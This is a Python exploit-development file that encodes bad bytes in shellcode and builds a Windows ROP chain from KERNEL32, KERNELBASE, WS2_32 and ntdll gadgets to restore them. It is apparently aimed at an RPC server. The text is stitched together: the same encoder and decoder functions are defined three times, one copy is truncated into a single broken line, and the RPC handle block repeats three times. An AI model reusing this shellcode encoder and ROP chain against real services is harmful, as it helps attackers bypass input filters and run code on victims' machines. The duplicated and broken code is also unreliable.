def mapBadChars(sh):
    """Return the offsets of every byte in ``sh`` that is a bad char.

    The bad-char set is fixed to the single NUL byte (0x00).  The list is
    what ``decodeShellcode`` uses to know which positions its ROP chain has
    to patch back after ``encodeShellcode`` replaced them.

    Args:
        sh: the raw, un-encoded shellcode as ``bytes``.

    Returns:
        Ascending, duplicate-free list of offsets into ``sh``; ``[]`` when
        ``sh`` is empty or contains no bad byte.
    """
    BADCHARS = b"\x00"
    # enumerate() yields the same ascending index list as the original
    # manual counter: a byte can match at most one entry of BADCHARS.
    return [pos for pos, byte in enumerate(sh) if byte in BADCHARS]
def encodeShellcode(sh):
    """Return ``sh`` with every bad byte swapped for its placeholder.

    0x00 becomes 0xff.  The placeholder is not itself a bad char, so a
    single translate table produces exactly what the original chained
    ``replace`` call produced.  The mapping is only reversible together
    with the offset list from ``mapBadChars``: ``decodeShellcode`` adds a
    fixed delta back at precisely those offsets.

    Args:
        sh: raw shellcode as ``bytes``.

    Returns:
        ``bytes`` of the same length as ``sh`` with bad bytes replaced.
    """
    BADCHARS = b"\x00"
    REPLACECHARS = b"\xff"
    table = bytes.maketrans(BADCHARS, REPLACECHARS)
    return sh.translate(table)
# NOTE(review): truncated copy of decodeShellcode -- it stops at the debug
# print, never emits the per-index ROP gadgets and has no ``return``; the
# complete definition (the one ending in ``return restoreRop``) appears
# further down in this file. Kept verbatim; treat as dead text.
defdecodeShellcode(dllBase, badIndex, shellcode): BADCHARS = b"\x00" CHARSTOADD = b"\x01" restoreRop = b"" for i in range(len(badIndex)): if i == 0: offset = badIndex[i] else: offset = badIndex[i] - badIndex[i-1] neg_offset = (-offset) & 0xffffffff value = 0 for j in range(len(BADCHARS)): if shellcode[badIndex[i]] == BADCHARS[j]: value = CHARSTOADD[j] value = (value) | 0x11111100# DL print(hex(value))
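def mapBadChars(sh, *, badchars=b"\x00"):
    """Return the offsets in ``sh`` that hold a byte from ``badchars``.

    ``decodeShellcode`` needs this list to know which positions its ROP
    chain must patch back after ``encodeShellcode`` replaced them.  The
    default set is the single NUL byte used elsewhere in this file; pass
    ``badchars`` to reuse the function for another filter instead of
    copying it with a different constant.

    Args:
        sh: raw, un-encoded shellcode as ``bytes``.
        badchars: bytes that must not appear in the final payload.

    Returns:
        Ascending, duplicate-free list of offsets into ``sh``; ``[]`` when
        ``sh`` is empty or clean.
    """
    bad = set(badchars)  # O(1) membership; a byte matches at most one entry
    return [pos for pos, byte in enumerate(sh) if byte in bad]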
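def encodeShellcode(sh, *, badchars=b"\x00", replacechars=b"\xff"):
    """Return ``sh`` with each bad byte swapped for its positional placeholder.

    ``badchars[k]`` is mapped to ``replacechars[k]`` (default: 0x00 -> 0xff).
    The result is only reversible together with the offset list from
    ``mapBadChars``; ``decodeShellcode`` adds a fixed delta back at exactly
    those offsets.

    Args:
        sh: raw shellcode as ``bytes``.
        badchars: bytes to remove from the payload.
        replacechars: placeholder per bad byte, same length as ``badchars``.

    Returns:
        ``bytes`` of the same length as ``sh``.

    Raises:
        ValueError: if the two tables differ in length (the original
            indexed ``replacechars`` blindly and died with IndexError), or
            if a placeholder is itself a bad byte -- the encoded payload
            would still be filtered by the target.
    """
    if len(badchars) != len(replacechars):
        raise ValueError("badchars and replacechars must have the same length")
    if set(replacechars) & set(badchars):
        raise ValueError("a replacement byte must not itself be a bad char")
    # One-shot translate is equivalent to the chained per-byte replace()
    # calls once the overlap check above rules out double substitution.
    return sh.translate(bytes.maketrans(badchars, replacechars))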
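def decodeShellcode(dllBase, badIndex, shellcode, *, badchars=b"\x00", charstoadd=b"\x01"):
    """Build the ROP chain that restores the bad bytes of the encoded payload.

    For every offset in ``badIndex`` the chain advances EAX by the distance
    from the previously patched byte (``SUB EAX, ECX`` with the negated
    delta popped into ECX, so positive deltas never put a NUL on the stack)
    and then executes ``ADD BYTE PTR [EAX], DL``.  ``charstoadd[k]`` is the
    delta that turns the placeholder written by ``encodeShellcode`` back
    into ``badchars[k]`` (0xff + 0x01 wraps to 0x00); it is OR-ed into
    0x11111100 so the dword popped into EDX holds no bad byte while DL
    stays exact.

    Args:
        dllBase: added to the WS2_32 / KERNEL32 / KERNELBASE gadget values
            below.  The POP EDX gadget is an absolute ntdll address and is
            NOT rebased -- it only works if that module sits where it did
            when the address was taken.
        badIndex: ascending offsets from ``mapBadChars``, computed on the
            same un-encoded ``shellcode`` passed here.
        shellcode: the ORIGINAL (un-encoded) shellcode; only used to look
            up which bad byte sat at each offset.
        badchars: bad-byte table, positionally paired with ``charstoadd``.
        charstoadd: per-bad-byte delta, same length as ``badchars``.

    Returns:
        The chain as packed little-endian ``bytes``, 24 bytes per offset;
        ``b""`` when ``badIndex`` is empty.

    Raises:
        ValueError: if the tables differ in length, or ``shellcode`` has no
            bad byte at some ``badIndex`` entry.  The usual cause is passing
            the *encoded* buffer; the original silently emitted a delta of
            0 in that case and left the placeholder in the payload.
        struct.error: if a rebased gadget value does not fit in 32 bits.
    """
    if len(badchars) != len(charstoadd):
        raise ValueError("badchars and charstoadd must have the same length")
    chain = []
    prev = 0  # first delta is measured from the start of the payload
    for idx in badIndex:
        kind = badchars.find(shellcode[idx])
        if kind < 0:
            raise ValueError(
                "shellcode[%d] is not a bad char -- pass the un-encoded buffer" % idx
            )
        offset = idx - prev
        prev = idx
        neg_offset = (-offset) & 0xffffffff
        value = charstoadd[kind] | 0x11111100  # delta lives in DL
        print(hex(value))
        # NOTE(review): the original comment says EAX starts at shellcode-1,
        # yet the first delta is badIndex[0] itself, which would land one byte
        # short; as written the chain is correct only if EAX points at the
        # payload start. A bad byte at offset 0 also packs a NUL dword here.
        # Confirm against the gadgets that set EAX up before this chain.
        chain.append(struct.pack("<L", dllBase + 0x7637768e))  # POP ECX # RETN ** [WS2_32.DLL] **
        chain.append(struct.pack("<L", neg_offset))
        chain.append(struct.pack("<L", dllBase + 0x758ba9a8))  # SUB EAX,ECX # RETN ** [KERNEL32.DLL] **
        chain.append(struct.pack("<L", 0x7721aed0))  # POP EDX # RETN ** [ntdll.dll] ** (absolute, not rebased)
        chain.append(struct.pack("<L", value))  # values in DL
        chain.append(struct.pack("<L", dllBase + 0x755bc4eb))  # ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] **
    return b"".join(chain)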
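def mapBadChars(sh, *, badchars=b"\x00\x09\x0a"):
    """Return the offsets in ``sh`` that hold a byte from ``badchars``.

    ``decodeShellcode`` needs this list to know which positions its ROP
    chain must patch back after ``encodeShellcode`` replaced them.  The
    default set (NUL, tab, newline) is the one used by the matching
    encoder/decoder in this file; pass ``badchars`` to reuse the function
    for another filter instead of copying it with a different constant.

    Args:
        sh: raw, un-encoded shellcode as ``bytes``.
        badchars: bytes that must not appear in the final payload.

    Returns:
        Ascending, duplicate-free list of offsets into ``sh``; ``[]`` when
        ``sh`` is empty or clean.
    """
    bad = set(badchars)  # O(1) membership; a byte matches at most one entry
    return [pos for pos, byte in enumerate(sh) if byte in bad]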
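def encodeShellcode(sh, *, badchars=b"\x00\x09\x0a", replacechars=b"\xff\x10\x06"):
    """Return ``sh`` with each bad byte swapped for its positional placeholder.

    ``badchars[k]`` is mapped to ``replacechars[k]`` (default: 0x00 -> 0xff,
    0x09 -> 0x10, 0x0a -> 0x06).  The result is only reversible together
    with the offset list from ``mapBadChars``; ``decodeShellcode`` adds a
    fixed delta back at exactly those offsets.

    Args:
        sh: raw shellcode as ``bytes``.
        badchars: bytes to remove from the payload.
        replacechars: placeholder per bad byte, same length as ``badchars``.

    Returns:
        ``bytes`` of the same length as ``sh``.

    Raises:
        ValueError: if the two tables differ in length (the original
            indexed ``replacechars`` blindly and died with IndexError), or
            if a placeholder is itself a bad byte -- the encoded payload
            would still be filtered by the target.
    """
    if len(badchars) != len(replacechars):
        raise ValueError("badchars and replacechars must have the same length")
    if set(replacechars) & set(badchars):
        raise ValueError("a replacement byte must not itself be a bad char")
    # One-shot translate is equivalent to the chained per-byte replace()
    # calls once the overlap check above rules out double substitution.
    return sh.translate(bytes.maketrans(badchars, replacechars))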
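def decodeShellcode(dllBase, badIndex, shellcode, *, badchars=b"\x00\x09\x0a", charstoadd=b"\x01\xf9\x04"):
    """Build the ROP chain that restores the bad bytes of the encoded payload.

    For every offset in ``badIndex`` the chain advances EAX by the distance
    from the previously patched byte (``SUB EAX, ECX`` with the negated
    delta popped into ECX, so positive deltas never put a NUL on the stack)
    and then executes ``ADD BYTE PTR [EAX], DL``.  ``charstoadd[k]`` is the
    delta that turns the placeholder written by ``encodeShellcode`` back
    into ``badchars[k]`` (0xff+0x01 wraps to 0x00, 0x10+0xf9 wraps to 0x09,
    0x06+0x04 gives 0x0a); it is OR-ed into 0x11111100 so the dword popped
    into EDX holds no bad byte while DL stays exact.

    Args:
        dllBase: added to the WS2_32 / KERNEL32 / KERNELBASE gadget values
            below.  The POP EDX gadget is an absolute ntdll address and is
            NOT rebased -- it only works if that module sits where it did
            when the address was taken.
        badIndex: ascending offsets from ``mapBadChars``, computed on the
            same un-encoded ``shellcode`` passed here.
        shellcode: the ORIGINAL (un-encoded) shellcode; only used to look
            up which bad byte sat at each offset.
        badchars: bad-byte table, positionally paired with ``charstoadd``.
        charstoadd: per-bad-byte delta, same length as ``badchars``.

    Returns:
        The chain as packed little-endian ``bytes``, 24 bytes per offset;
        ``b""`` when ``badIndex`` is empty.

    Raises:
        ValueError: if the tables differ in length, or ``shellcode`` has no
            bad byte at some ``badIndex`` entry.  The usual cause is passing
            the *encoded* buffer; the original silently emitted a delta of
            0 in that case and left the placeholder in the payload.
        struct.error: if a rebased gadget value does not fit in 32 bits.
    """
    if len(badchars) != len(charstoadd):
        raise ValueError("badchars and charstoadd must have the same length")
    chain = []
    prev = 0  # first delta is measured from the start of the payload
    for idx in badIndex:
        kind = badchars.find(shellcode[idx])
        if kind < 0:
            raise ValueError(
                "shellcode[%d] is not a bad char -- pass the un-encoded buffer" % idx
            )
        offset = idx - prev
        prev = idx
        neg_offset = (-offset) & 0xffffffff
        value = charstoadd[kind] | 0x11111100  # delta lives in DL
        print(hex(value))
        # NOTE(review): the original comment says EAX starts at shellcode-1,
        # yet the first delta is badIndex[0] itself, which would land one byte
        # short; as written the chain is correct only if EAX points at the
        # payload start. A bad byte at offset 0 also packs a NUL dword here.
        # Confirm against the gadgets that set EAX up before this chain.
        chain.append(struct.pack("<L", dllBase + 0x7637768e))  # POP ECX # RETN ** [WS2_32.DLL] **
        chain.append(struct.pack("<L", neg_offset))
        chain.append(struct.pack("<L", dllBase + 0x758ba9a8))  # SUB EAX,ECX # RETN ** [KERNEL32.DLL] **
        chain.append(struct.pack("<L", 0x7721aed0))  # POP EDX # RETN ** [ntdll.dll] ** (absolute, not rebased)
        chain.append(struct.pack("<L", value))  # values in DL
        chain.append(struct.pack("<L", dllBase + 0x755bc4eb))  # ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] **
    return b"".join(chain)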
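print("Getting a handle to the RPC server")
# Opnum 4 with a single little-endian DWORD (2) as the stub; what the
# request means is not visible here -- only the 3-DWORD reply shape is.
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
    print("Something went wrong")
    sys.exit(1)
# Check the reply size BEFORE unpacking: struct.unpack("III") either yields
# exactly three values or raises struct.error, so the old post-unpack
# ``len(res) < 3`` test could never fire and a short/odd-sized reply died
# with a traceback instead of the intended message. "<" keeps the byte
# order consistent with the request packing above (native "III" only
# differs on big-endian hosts).
_REPLY_FMT = "<III"
if len(res) != struct.calcsize(_REPLY_FMT):
    print("Received unexpected length value")
    sys.exit(1)
res = struct.unpack(_REPLY_FMT, res)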
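print("Getting a handle to the RPC server")
# Opnum 4 with a single little-endian DWORD (2) as the stub; what the
# request means is not visible here -- only the 3-DWORD reply shape is.
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
    print("Something went wrong")
    sys.exit(1)
# Check the reply size BEFORE unpacking: struct.unpack("III") either yields
# exactly three values or raises struct.error, so the old post-unpack
# ``len(res) < 3`` test could never fire and a short/odd-sized reply died
# with a traceback instead of the intended message. "<" keeps the byte
# order consistent with the request packing above (native "III" only
# differs on big-endian hosts).
_REPLY_FMT = "<III"
if len(res) != struct.calcsize(_REPLY_FMT):
    print("Received unexpected length value")
    sys.exit(1)
res = struct.unpack(_REPLY_FMT, res)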
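print("Getting a handle to the RPC server")
# Opnum 4 with a single little-endian DWORD (2) as the stub; what the
# request means is not visible here -- only the 3-DWORD reply shape is.
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
    print("Something went wrong")
    sys.exit(1)
# Check the reply size BEFORE unpacking: struct.unpack("III") either yields
# exactly three values or raises struct.error, so the old post-unpack
# ``len(res) < 3`` test could never fire and a short/odd-sized reply died
# with a traceback instead of the intended message. "<" keeps the byte
# order consistent with the request packing above (native "III" only
# differs on big-endian hosts).
_REPLY_FMT = "<III"
if len(res) != struct.calcsize(_REPLY_FMT):
    print("Received unexpected length value")
    sys.exit(1)
res = struct.unpack(_REPLY_FMT, res)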